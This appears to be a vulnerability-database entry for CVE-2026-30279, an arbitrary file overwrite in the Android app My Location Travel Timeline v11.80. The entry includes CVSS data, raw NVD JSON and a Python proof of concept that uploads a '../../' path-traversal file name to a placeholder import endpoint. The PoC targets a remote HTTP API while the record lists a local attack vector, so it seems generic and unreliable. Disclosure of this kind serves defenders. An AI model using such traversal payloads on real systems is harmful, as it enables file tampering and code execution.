Security Vulnerability Report
CVE-2026-30279 CVSS 8.4 HIGH

Published: 2026-03-31 18:16:47
Last Modified: 2026-04-03 18:32:40

Description

An arbitrary file overwrite vulnerability in Squareapps LLC My Location Travel Timeline v11.80 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure.

CVSS Details

CVSS Score: 8.4
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:squareapps:my_location:11.80:*:*:*:*:android:*:* - VULNERABLE
Squareapps LLC My Location Travel Timeline v11.80

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Exploit Title: Squareapps My Location Travel Timeline v11.80 - Arbitrary File Overwrite (PoC)
# Description: This script demonstrates how an attacker might overwrite a critical file.

# Target configuration
target_url = "http://target-host:port/api/import_file"

# The internal file to overwrite (e.g., a configuration or library file)
# Attackers may use path traversal techniques like '../../'
target_file = "../../data/critical_config.db"

# Malicious content to write
malicious_data = b"MALICIOUS_PAYLOAD_CONTENT"

files = {
    'file': (target_file, malicious_data, 'application/octet-stream')
}

try:
    response = requests.post(target_url, files=files)
    if response.status_code == 200:
        print("[+] File potentially overwritten successfully.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30279", "sourceIdentifier": "[email protected]", "published": "2026-03-31T18:16:47.003", "lastModified": "2026-04-03T18:32:39.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An arbitrary file overwrite vulnerability in Squareapps LLC My Location Travel Timeline v11.80 allows attackers to overwrite critical internal files via the file import process, leading to arbitrary code execution or information exposure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:squareapps:my_location:11.80:*:*:*:*:android:*:*", "matchCriteriaId": "C554AEC0-CD12-445B-B1C5-6C6913600B32"}]}]}], "references": [{"url": "http://my.com", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://github.com/Secsys-FDU/AF_CVEs/issues/28", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://lightapp3.firebaseapp.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://secsys.fudan.edu.cn/", "source": "[email protected]", "tags": ["Not Applicable"]}]}}